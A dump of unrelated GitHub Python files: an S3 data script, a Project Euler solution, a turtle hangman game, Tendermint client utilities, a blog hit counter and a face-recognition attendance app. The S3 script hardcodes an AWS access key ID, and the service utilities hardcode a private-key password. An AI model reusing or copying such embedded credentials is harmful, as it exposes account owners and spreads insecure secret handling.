+{"seq_id":"484128203","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom io import StringIO\nfrom scipy.stats import entropy\nfrom datetime import datetime\n\nS3_BUCKET = 'dmm-microbench'\n\ns3 = boto3.client('s3', aws_access_key_id=\"AKIASVDNFDSGZYUVLQED\", aws_secret_access_key=\"y8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXre\")\n\ndef download_s3_file(file_name, destination_file_name):\n s3.download_file(Bucket=S3_BUCKET, Key=file_name, Filename=destination_file_name)\n\ndef get_content(file_name, expression):\n return s3.select_object_content(\n Bucket=S3_BUCKET,\n Key=file_name,\n ExpressionType='SQL',\n Expression=expression,\n InputSerialization={'CSV': {\"FileHeaderInfo\": \"Use\"}},\n OutputSerialization={'CSV': {}},\n )\n\n\ndef convert_data_to_df(data, record_header):\n for event in data['Payload']:\n if 'Records' in event:\n record_header.append(event['Records']['Payload'])\n csv_content = ''.join(r.decode('utf-8').replace(\"\\r\", \"\") for r in record_header)\n csv_pd = pd.read_csv(StringIO(csv_content))\n\n print('\\n##################################')\n print(f\"Length of dataframe: {len(csv_pd)}\")\n print(f\"Memory usage of dataframe: \\n {csv_pd.info(memory_usage='deep')}\")\n print('\\n##################################')\n\n return pd.DataFrame(csv_pd)\n\ndef convert_file_to_hdf5(file_name):\n import vaex\n vaex.from_csv(file_name, convert=True, chunk_size=500_000)\n\ni = 1\n\ndownload_s3_file(f\"yellow_tripdata_2019-0{i}.csv\", f\"yellow_tripdata_2019-0{i}.csv\")\n \nconvert_file_to_hdf5(f\"yellow_tripdata_2019-0{i}.csv\")","repo_name":"mohithg/largedata-histogram","sub_path":"test_vaex.py","file_name":"test_vaex.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21211815754","text":"import math\nimport sys\n\ndef C(n, k):\n return math.factorial(n) // math.factorial(k) // math.factorial(n-k)\n\ndef main():\n billionaire_ways = 0\n for h in range(432, 1001):\n billionaire_ways += C(1000, h)\n print(billionaire_ways / 2**1000)\n \nif __name__ == '__main__':\n sys.exit(main())\n\n# Final capital = (1 + 2x)^h (1 - x)^(1000 - h) where h is the count of heads.\n#\n# To be a billionaire, we need (1 + 2x)^h (1 - x)^(1000 - h) >= 10^9.\n# Or h >= (9 Log[10] - 1000 Log[1 - x])/(-Log[1 - x] + Log[1 + 2 x])\n#\n# By Wolfram Alpha website, we can solve the equation D[g(x), x] = 0\n# The proportion x ~~ 0.14688392244094067657558240, and thus \n# g(x) ~~ 431.25594829396045105038827, or h = 432.\n","repo_name":"syurskyi/Algorithms_and_Data_Structure","sub_path":"_algorithms_challenges/projecteuler/ProjectEuler-master(2)/ProjectEuler-master/267.py","file_name":"267.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"15647171467","text":"import turtle\nfrom random import shuffle\nimport unicodedata\nimport time\n\n\ndef nome_jogo(turtle):\n turtle.setpos(20,230)\n turtle.write('Jogo da Forca', font=('Arial',20,'bold'))\n turtle.home()\n\ndef desenho_forca(turtle, window_comprimento):\n coordenada_x1 = (window_comprimento/-2)+30\n turtle.setpos(coordenada_x1,-200)\n turtle.pendown()\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.right(90)\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.penup()\n coordenada_x2 = (window_comprimento/-2)+105\n turtle.setpos(coordenada_x2,-200)\n turtle.pendown()\n turtle.forward(250)\n turtle.right(90)#(-245,150)\n turtle.forward(100)\n turtle.right(90)#(-145,150)\n turtle.forward(25)\n turtle.penup()\n turtle.left(90)#(-145,125)\n turtle.home()\n\ndef desenho_cabeca (turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,25)\n turtle.left(180)\n turtle.pendown()\n turtle.fillcolor('yellow')\n turtle.begin_fill()\n turtle.circle(25)\n turtle.end_fill()\n turtle.fillcolor('black')\n turtle.penup()\n turtle.left(180)\n turtle.home()\n\ndef desenho_dorso(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(90)\n turtle.pendown()\n turtle.forward(80)\n turtle.penup()\n turtle.left(90)\n turtle.home()\n\ndef desenho_left_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(135)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(135)\n turtle.home()\n\ndef desenho_right_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(45)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(45)\n turtle.home()\n\ndef desenho_left_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(120)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(120)\n turtle.home()\n\ndef desenho_right_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(60)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(60)\n turtle.home()\n\ndef desenho_espacos(turtle, letras_palavra, window_comprimento):\n posicoes_letras = []\n coordenada_x = (window_comprimento/2)-30\n turtle.setpos(coordenada_x,-225)\n turtle.left(180)\n turtle.pensize(3)\n for i in letras_palavra:\n if i == ' ':\n turtle.forward(35)\n posicoes_letras.append([turtle.pos(),i])\n else:\n turtle.pendown()\n turtle.forward(30)\n turtle.penup()\n turtle.forward(5)\n posicoes_letras.append([turtle.pos(),i])\n turtle.pensize(5)\n turtle.left(180)\n turtle.home()\n posicoes_letras.reverse()\n return posicoes_letras\n\ndef desenho_letras(turtle, palavra, posicoes_letras, escolha, window_comprimento, erros, acertos, erros_lista):\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n \n coordenada_x = (window_comprimento/-2)+erros*20\n index_acertos = []\n erro = ''\n \n \n if escolha in no_accent:\n for x,e in enumerate(no_accent):\n if escolha == e:\n index_acertos.append(x)\n if index_acertos in acertos:\n None\n for i in index_acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n return 0,index_acertos,None\n else:\n erro = escolha\n if erro in erros_lista:\n return 1,None,None\n else:\n turtle.setpos(coordenada_x+30,-255)\n turtle.write(escolha, font=('Arial',18,'bold'))\n turtle.home()\n return 1,None,erro\n\ndef caneta_setup ():\n caneta.hideturtle()\n caneta.speed(100)\n caneta.penup()\n caneta.color('Black')\n caneta.pensize(5)\n\ndef setup_window(comprimento):\n if comprimento <= 500:\n comprimento += 80\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 500 and comprimento <= 650:\n comprimento += 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 650 and comprimento <= 800:\n comprimento -= 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 800 and comprimento <= 1000:\n comprimento -= 110\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n else:\n comprimento -= 250\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n\ndef body_maker(erros):\n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n time.sleep(2)\n return True\n\ndef repor_desenho(turtle, posicoes_letras, acertos, erros, erros_lista, window_comprimento):\n coordenada_x = (window_comprimento/-2)+30\n \n for i in acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n \n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n return True\n else:\n None\n \n turtle.setpos(coordenada_x,-255)\n for j in erros_lista:\n turtle.write(j, font=('Arial',18,'bold'))\n turtle.forward(20)\n\ndef sim():\n window.reset()\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n window.exitonclick()\n\n'''\n-------------------------------------------------------------------------------\n'''\n\n\nwindow = turtle.Screen() # limite_x: +-330, Limite_y: +-270\nwindow.bgcolor('lightblue')\nwindow.title('Jogo da Forca')\n\n\ncaneta = turtle.Turtle()\ncaneta_setup()\n\n\n\nlista_palavras = [] \nL = open('entrada.txt','r+',encoding='utf-8')\n\nfor i in L.readlines():\n s = i.lower().strip()\n if s == '':\n None\n else:\n lista_palavras.append(s)\nL.close()\n'''\n-------------------------------------------------------------------------------\n'''\n\nletras_palavra = []\n\nwhile lista_palavras != []:\n shuffle(lista_palavras)\n palavra = lista_palavras[int(len(lista_palavras)/2)]\n del lista_palavras[int(len(lista_palavras)/2)]\n \n for i in palavra:\n letras_palavra.append(i)\n letras_palavra.reverse()\n \n comprimento = (len(letras_palavra)*35)*2\n\n setup_window(comprimento)\n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n \n posicoes_letras = desenho_espacos(caneta, letras_palavra, window.window_width()) \n \n escolha = ''\n erros = 0\n erros_lista = []\n acertos = [] \n \n while True:\n escolha = window.textinput('','Escolha uma letra ou chute a palavra')\n \n if escolha == None:\n caneta.setpos(-175,100)\n caneta.write('Jogador desistiu. Volte sempre.', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n if escolha == no_accent or escolha == palavra:\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n elif escolha.isalpha() and len(escolha) == 1:\n a = []\n s = 0\n e = ''\n \n s,a,e = desenho_letras(caneta, palavra, posicoes_letras, escolha, window.window_width(), erros, acertos, erros_lista)\n if a == None:\n a = []\n else:\n for i in a:\n acertos.append(i)\n \n if e == None:\n e = ''\n else:\n erros_lista.append(e)\n erros += s\n \n \n p = body_maker(erros)\n if p == True:\n break\n \n \n if len(acertos) == len(palavra):\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n caneta.setpos(-95,100)\n caneta.write('Escolha Inválida.', font=('Arial',18,'bold'))\n time.sleep(2)\n caneta.reset()\n caneta_setup()\n \n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n desenho_espacos(caneta, letras_palavra, window.window_width())\n repor_desenho(caneta, posicoes_letras, acertos, erros, erros_lista, window.window_width())\n caneta.reset()\n window.reset()\n caneta_setup()\n if escolha == None:\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n window.exitonclick()\n \n \n \n \n'''\n-------------------------------------------------------------------------------\n'''\n\n\n\nwindow.exitonclick()\n","repo_name":"IgneousGuikas/RodrigoGikas_EP2","sub_path":"Exercicio Jogo da Forca(9).py","file_name":"Exercicio Jogo da Forca(9).py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18432273630","text":"'''\n========================\nservice utilities module\n========================\nCreated on July.14, 2020\n@author: Xu Ronghua\n@Email: rxu22@binghamton.edu\n@TaskDescription: This module provide encapsulation of test API to interact with RPC exposed by service node.\n'''\n\nimport time\nimport logging\nimport requests\nimport json\n\nfrom utilities import TypesUtil, FileUtil\nfrom wrapper_pyca import Crypto_Hash, Crypto_DSA\nfrom Tender_RPC import Tender_RPC\n\n\nlogger = logging.getLogger(__name__)\n# indextoken_logger = logging.getLogger(\"Index_Token\")\n# indextoken_logger.setLevel(logging.INFO)\n\n\nclass TenderUtils(object):\n @staticmethod\n def load_ENF(ENF_file):\n '''\n Load ENF data from ENF_file\n\n Args:\n ENF_name: ENF file name\n Returns:\n json_ENF: json format ENF data\n\n '''\n ls_lines=FileUtil.ReadLines(ENF_file)\n ls_record=[]\n for line in ls_lines:\n #print(line[:-1].split(';'))\n ls_record.append(line[:-1].split(';'))\n\n ls_ENF=[]\n for record in ls_record:\n ls_ENF.append( format(float(record[0]), '.2f') )\n\n # print(ls_ENF)\n json_ENF = {}\n json_ENF['id']=ENF_file\n json_ENF['ENF']=ls_ENF\n\n return json_ENF\n\n\n @staticmethod\n def verify_ENF(ENF_file):\n '''\n Verify ENF value by querying from blockchain\n\n Args:\n ENF_name: ENF file name\n Returns:\n Verified result: True or False\n '''\n # 1) Read token data using call\n ls_time_exec = []\n\n query_json = {}\n query_json['data']='\"' + ENF_file +'\"'\n start_time=time.time()\n\n query_ret=Tender_RPC.abci_query(query_json)\n\n # -------- parse value from response and display it ------------\n key_str=query_ret['result']['response']['key']\n value_str=query_ret['result']['response']['value']\n logger.info(\"Fetched ENF value:\")\n logger.info(\"id: {}\".format(TypesUtil.base64_to_ascii(key_str)) )\n if( value_str!= None):\n query_ENF_value = TypesUtil.base64_to_ascii(value_str)\n else:\n query_ENF_value = ''\n # convert tx to json format\n query_ENF_json = TypesUtil.tx_to_json(query_ENF_value)\n logger.info(\"value: {}\".format(query_ENF_json))\n\n # 2) verify signature\n string_ENF = str(query_ENF_json['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n sign_ENF = TypesUtil.hex_to_string(query_ENF_json['sign_ENF'])\n\n load_public_key_bytes = Crypto_DSA.load_key_bytes('public_key_file')\n reload_public_key = Crypto_DSA.load_public_key_bytes(load_public_key_bytes)\n verify_sign=Crypto_DSA.verify(reload_public_key,sign_ENF,byte_ENF)\n logger.info(\"Sign verification: {}\".format(verify_sign))\n \n exec_time=time.time()-start_time\n ls_time_exec.append( format( exec_time*1000, '.3f' ) ) \n\n # Prepare log messgae\n str_time_exec=\" \".join(ls_time_exec)\n FileUtil.save_testlog('test_results', 'exec_verify_ENF.log', str_time_exec)\n\n # 3) return verify hash model result\n return verify_sign\n\n @staticmethod\n def tx_evaluate(ENF_file):\n '''\n Launch tx and evaluate tx committed time\n\n Args:\n ENF_file: ENF file name\n Returns:\n tx committed reulst\n '''\n # 1) load ENF data from file\n json_ENF = TenderUtils.load_ENF(ENF_file)\n logger.info(json_ENF)\n\n # 2) sign ENF data in json_ENF['ENF']\n string_ENF = str(json_ENF['ENF'])\n byte_ENF = TypesUtil.string_to_bytes(string_ENF)\n load_private_key_bytes = Crypto_DSA.load_key_bytes('private_key_file')\n reload_private_key = Crypto_DSA.load_private_key_bytes(load_private_key_bytes, \n encryp_pw=b'samuelxu999')\n sign_ENF = Crypto_DSA.sign(reload_private_key, byte_ENF)\n logger.info(sign_ENF)\n\n # 3) evaluate tx committed time\n start_time=time.time()\n logger.info(\"tx signed ENF: {} to blockchain...\\n\".format(ENF_file)) \n\n # -------- prepare parameter for tx ------------\n tx_json = {}\n key_str = ENF_file\n value_json = {}\n value_json['ENF']=json_ENF['ENF']\n value_json['sign_ENF']=TypesUtil.string_to_hex(sign_ENF)\n # convert json to tx format\n value_str = TypesUtil.json_to_tx(value_json)\n tx_data = key_str + \"=\" + value_str \n # --------- build parameter string: tx=? --------\n tx_json['tx']='\"' + tx_data +'\"' \n # print(tx_json)\n tx_ret=Tender_RPC.broadcast_tx_commit(tx_json)\n exec_time=time.time()-start_time\n logger.info(\"tx committed time: {:.3f}\\n\".format(exec_time, '.3f')) \n FileUtil.save_testlog('test_results', 'exec_tx_commit_ENF.log', format(exec_time, '.3f'))\n # print(tx_ret)\n return tx_ret\n\nclass ContractUtils(object):\n '''\n Get BC_account given node_name\n @node_name: ip_address:port_num\n @datafile: node account datafile path\n '''\n @staticmethod\n def getAddress(node_name, datafile):\n address_json = json.load(open(datafile))\n return address_json[node_name]\n\n '''\n Get IndexAuth_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getIndexToken(service_addr, index_id, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getIndexToken\"\n params={}\n params['index_id']=index_id\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get authorized nodes\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getAuthorizedNodes(service_addr, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/getAuthorizedNodes\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify hashed index value\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def verify_indexToken(service_addr, index_id, index_data, data_args={}):\n #construct api_url\n api_url = \"http://\" + service_addr + \"/indexauth/api/v1.0/verify_indexToken\"\n params={}\n params['index_id']=index_id\n params['index_data']=index_data\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get CapAC_Token\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getCapToken(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/getCapToken\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify Access\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidAccess(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/BlendCAC/api/v1.0/isValidAccess\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Get Vnode information\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def getVNodeInfo(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/getVNodeInfo\"\n params={}\n params['client_addr']=data_args['host_address']\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\n '''\n Verify identity\n @host_addr: ip_address:port_num\n '''\n @staticmethod\n def isValidID(data_args={}):\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/AuthID/api/v1.0/isValidID\"\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url, data=json.dumps(data_args), headers=headers)\n\n #get response json\n json_response = response.json()\n\n return json_response\n\nclass MonoClient(object):\n '''\n Get record by id\n '''\n @staticmethod\n def Get_DataByID(data_args={}):\n # construct params\n params={}\n params['project_id']=data_args['project_id']\n\n #construct api_url\n service_addr = data_args['service_addr']\n api_url = \"http://\" + service_addr + \"/test/api/v1.0/dt/project\" \n\n headers = {'Content-Type' : 'application/json'}\n response = requests.get(api_url,params=params, data=json.dumps(data_args['data']), headers=headers)\n \n #get response json\n json_response = response.json() \n\n return json_response","repo_name":"samuelxu999/Research","sub_path":"Security/py_dev/BlendSPS/src/service_utils.py","file_name":"service_utils.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"30653422542","text":"from typing import List\nfrom typing import List\n\ndef sneak_string_v1(chars: str) -> List[List[str]]:\n result = [[], [], []]\n index = len(result) // 2\n up_flag = 1\n for char in chars:\n if index == 0:\n result[0].append(char)\n result[1].append(' ')\n result[2].append(' ')\n index = 1\n up_flag = 0\n elif index == 1: \n result[0].append(' ')\n result[1].append(char)\n result[2].append(' ')\n if up_flag:\n index -= 1\n else:\n index += 1\n elif index == 2:\n result[0].append(' ')\n result[1].append(' ')\n result[2].append(char)\n up_flag = 1\n index = 1\n \n return result\n\ndef sneak_string_v2(chars: str, size: int) -> List[List[str]]:\n result = [[] for _ in range(size)]\n result_index = {i for i in range(len(result))}\n insert_index = len(result) // 2\n up_flag = 1\n \n for char in chars:\n result[insert_index].append(char)\n for rest_index in result_index - {insert_index}:\n result[rest_index].append(' ')\n \n if insert_index == min(result_index):\n insert_index += 1\n up_flag = 0\n elif insert_index == max(result_index):\n insert_index -= 1\n up_flag = 1\n else:\n if up_flag:\n insert_index -= 1\n else:\n insert_index += 1\n \n return result\n \n\ndef print_sneak(result: List[List[str]]) -> None:\n for list in result:\n print(''.join(list))\n \n \n \nif __name__ == '__main__':\n chars1 = '012345678901234567890123456789'\n chars2 = 'abcdefghijklmnopqrstuzwxyz'\n # result = sneak_string_v1(chars1)\n # print_sneak(result)\n result = sneak_string_v2(chars2, 10)\n print_sneak(result)","repo_name":"Tsujiba/Python-Sample","sub_path":"algolism/07_quiz/sneak_output.py","file_name":"sneak_output.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"7389605836","text":"import logging\n\nfrom aiohttp import web\nfrom ipaddress import ip_address\nfrom netifaces import interfaces, ifaddresses, AF_INET\nimport qrcode\n\nfrom manokee.web.app import app\n\n\ndef ipv4_addresses():\n result = []\n for interface in interfaces():\n links = ifaddresses(interface).get(AF_INET, [])\n for link in links:\n addr = ip_address(link[\"addr\"])\n if not addr.is_loopback:\n result.append(addr)\n return result\n\n\ndef main():\n port = 5000\n addresses = ipv4_addresses()\n assert len(addresses) > 0\n print(\"OPEN MANOKEE IN A BROWSER AT:\")\n for address in addresses:\n url = f\"http://{address}:{port}/\"\n print(url)\n qr = qrcode.QRCode()\n qr.add_data(url)\n qr.print_ascii()\n web.run_app(app, port=port, access_log=logging.getLogger(\"webserver\"))\n","repo_name":"smiszym/manokee","sub_path":"manokee/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"21083386926","text":"import requests\nimport time\nimport re\n\nurl = 'http://comet.blog.sina.com.cn/api?maintype=hits&act=4&aid=5c47219b01011oox&ref=http%3A%2F%2Fblog.sina.com.cn%2Fu%2F1548165531&varname=requestId_63901005'\nheaders = {\n 'Referer': 'http://blog.sina.com.cn/u/5874775575'\n}\n\nwhile True:\n wb_date = requests.get(url, headers=headers)\n a = wb_date.text.split('=')[-1]\n a = int(re.findall('\\d{1,10}', a)[0])\n time.sleep(10)\n wb_date = requests.get(url, headers=headers)\n b = wb_date.text.split('=')[-1]\n b = int(re.findall('\\d{1,10}', b)[0])\n print((b - a) * 6 * 60)\n","repo_name":"meta-tabchen/Python-In-Action","sub_path":"新浪博客/count001.py","file_name":"count001.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"15454556617","text":"from sqlite3 import connect\nfrom imutils import face_utils\nimport dlib\nimport cv2\nfrom face_recognition import load_image_file, face_encodings, compare_faces\nfrom tkinter import *\nimport os\nimport cv2\nfrom tkinter import filedialog\nfrom PIL import ImageTk,Image\nimport tkinter\nimport numpy as np\nfrom scipy import spatial\ndef read_data_from_db():\n\tdb_loc = r'C:\\Users\\ELCOT\\Documents\\Chandru\\Git_Bash\\Attendance_system_using_facial_recognition\\CODE\\final\\db\\STUDENTSDATA.db'\n\t#print ('studentsdata Database opened')\n\tconn = connect(db_loc)\n\tcurser = conn.cursor()\n\tcommand = '''SELECT * FROM students_record '''\n\tdata = curser.execute(command)\n\tres_list = []\n\ttemp_lis = []\n\ttemp_encoding = []\n\tfor record in data:\n\t\ttemp_lis = list(record[0:2])\n\t\ttemp_encoding = record[2:]\n\t\ttemp_lis.append(np.asarray(temp_encoding))\n\t\tres_list.append(tuple(temp_lis))\n\tconn.close()\n\tres = tuple(res_list)\n\treturn (res)\n\ndef find_faces_in_img(img_loc):\n\t# initialize dlib's face detector (HOG-based) and then create\n\t# the facial landmark predictor\n\tdetector = dlib.get_frontal_face_detector()\n\t# load the input image and convert it to grayscale\n\timage = cv2.imread(img_loc)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t#frame = imutils.resize(frame, width=450)\n\t# detect faces in the grayscale image\n\trects = detector(gray, 0)\n\tencoding_in_class_lis = []\n\t# loop over the face detections\n\tfor (i, rect) in enumerate(rects):\n\t\t# determine the facial landmarks for the face region, then\n\t\t# convert the facial landmark (x, y)-coordinates to a NumPy\n\t\t# array\n\t\t# Start coordinate, here (5, 5) \n\t\t# represents the top left corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.left())\n\t\tlis.append(rect.top())\n\t\tstart_point = tuple(map(int, lis))\n\t\t# Ending coordinate, here (220, 220) \n\t\t# represents the bottom right corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.right())\n\t\tlis.append(rect.bottom())\n\t\tend_point = tuple(map(int, lis))\n\t\t# # Blue color in BGR \n\t\t# color = (255, 0, 0) \n\t\t# # Line thickness of 2 px \n\t\t# thickness = 2\n\t\tcrop_img = image[start_point[1]:end_point[1], start_point[0]:end_point[0]]\n\t\tcv2.imwrite(r'C:\\Users\\ELCOT\\Documents\\Cls{}.jpg'.format(i), crop_img)\n\t\tencoding = face_encodings(crop_img)[0]\n\t\tencoding_in_class_lis.append(encoding)\n\tencoding_in_class = tuple(encoding_in_class_lis)\n\treturn (encoding_in_class)\n\ndef compare_2_faces(known_encoding, unknown_encoding):\n\t# known encoding will be register images that is already in the db\n\t# unknown encoding will be the image taken \n\t# result = 1 - spatial.distance.cosine(known_encoding, unknown_encoding)\n\t# print(result)\n\t# return (result)\n\tres = compare_faces([known_encoding], unknown_encoding, tolerance=0.5)[0]\n\t#print(res)\n\treturn (res)\n\ndef compare_in_db(encoding_in_class, encoding_in_db):\n\tfor i in encoding_in_class:\n\t\tfor j in encoding_in_db:\n\t\t\tif (compare_2_faces(j[2], i)):\n\t\t\t\tprint(j[0])\n\t\t\t\tprint(j[1])\n\t\t\t\tbreak\n\ndef browse():\n global filename\n \n \n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = ((\"all files\",\n \"*.*\"),\n (\"Text files\",\n \"*.txt*\")))\n\n \n\n label_file_explorer = Label(\n text = \"File Explorer using Tkinter\",\n width = 100, height = 4,\n fg = \"blue\")\n\n label_file_explorer.configure(text=\"File Opened: \"+filename)\n Label(screen,text = filename).place(x=150,y=100)\n\n button_exit = Button(\n text = \"Exit\",\n command = exit)\n\ndef send_data():\n\timg_loc = filename\n\tencoding_in_class = find_faces_in_img(img_loc)\n\tencoding_in_db = read_data_from_db()\n\tcompare_in_db(encoding_in_class, encoding_in_db)\n\ndef main_screen():\n\tglobal screen\n\tscreen = Tk()\n\tscreen.geometry(\"400x350\")\n\tscreen.title(\"Register\")\n\tglobal userid\n\tglobal stdname\n\tglobal path\n\tglobal registerid\n\tglobal studentname\n\tglobal filepath\n\tuserid=StringVar()\n\tstdname=StringVar()\n\tpath=StringVar()\n\tLabel(screen,text=\"Browse Image to mark attendance \").place(x=100,y=50)\n\tLabel(screen,text=\"\").pack()\n\tLabel(screen,text = \"Choose Image:\").place(x=50,y=100)\n\tButton(screen,text = \"Browse\",width=\"15\", command = browse).place(x=150,y=150)\n\tButton(screen,text = \"submit\",width=\"15\", command = send_data).place(x=150,y=200)\n\tscreen.mainloop()\n\nif __name__ == \"__main__\":\n\tmain_screen()","repo_name":"KabilChakravarthy/Face_Recognition_Attendance_System","sub_path":"CODE/final/face_attend_2.py","file_name":"face_attend_2.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
